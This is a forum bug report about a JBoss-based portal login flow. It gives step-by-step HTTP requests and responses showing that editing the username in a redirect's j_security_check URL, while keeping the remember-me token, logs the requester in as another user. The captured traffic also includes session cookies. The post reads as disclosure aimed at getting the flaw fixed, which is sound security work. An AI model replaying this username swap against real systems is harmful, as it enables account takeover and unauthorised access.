8 Replies Latest reply on Dec 16, 2013 9:44 PM by Hai Nguyen

    How to avoid bypass authentication (detail test steps)

    Wells G Novice

      Steps to Reproduce:

      1. Log into our portal project with correct username and password

       

      POST /portal/login HTTP/1.1

      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

      Accept-Language: en-US,en;q=0.5

      Accept-Encoding: gzip, deflate

      Referer:http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout

      Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

      Connection: keep-alive

      Content-Type: application/x-www-form-urlencoded

      Content-Length: 84

       

      initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx

       

      2. Get a 302 response and open the /portal/private/project/home page

       

      HTTP/1.1 302 Moved Temporarily

      Date: Thu, 15 Aug 2013 07:19:48 GMT

      X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1

      Location: http://XXXX//home

      Content-Length: 0

      Keep-Alive: timeout=15, max=100

      Connection: Keep-Alive

      Content-Type: text/plain; charset=UTF-8

       

      GET /portal/private/xxxx/home HTTP/1.1

      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

      Accept-Language: en-US,en;q=0.5

      Accept-Encoding: gzip, deflate

      Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout

      Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

      Connection: keep-alive

       

      3. Get a 302 response again, which redirect to secure check page with the username, modify the username to someone else that is logged in.

       

      Original message:

       

      HTTP/1.1 302 Moved Temporarily

      Date: Thu, 15 Aug 2013 07:29:42 GMT

      Pragma: No-cache

      Cache-Control: no-cache

      Expires: Wed, 31 Dec 1969 19:00:00 EST

      Location:http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746

        ^^^^^^^^^^^^^^^^^

      Content-Type: text/html;charset=UTF-8

      Content-Length: 0

      Keep-Alive: timeout=15, max=100

      Connection: Keep-Alive

       

       

      Modified message:

       

      HTTP/1.1 302 Moved Temporarily

      Date: Thu, 15 Aug 2013 07:29:42 GMT

      Pragma: No-cache

      Cache-Control: no-cache

      Expires: Wed, 31 Dec 1969 19:00:00 EST

      Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_password=rememberme1447024746

        ^^^^^^^^^^^^^^^^

      Content-Type: text/html;charset=UTF-8

      Content-Length: 0

      Keep-Alive: timeout=15, max=100

      Connection: Keep-Alive

       

       

      4. Send GET request to get the page in "Location" of step3, which is with username "userB"

       

      GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1

      ^^^^^^^^^^^^^^^^^^

      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

      Accept-Language: en-US,en;q=0.5

      Accept-Encoding: gzip, deflate

      Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&portal:action=Logout

      Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

      Connection: keep-alive

       

      5. Get the response with code 302 and redirect to home page , attchment1.

       

      6. Click content tab in the home page, it will display now login with "userB", and operations can be performed as userB too,

       

       

      Actual results:

      Successfully bypass authentication.

       

       

      Expected results:

      Should not log into the project with "userB" successfully.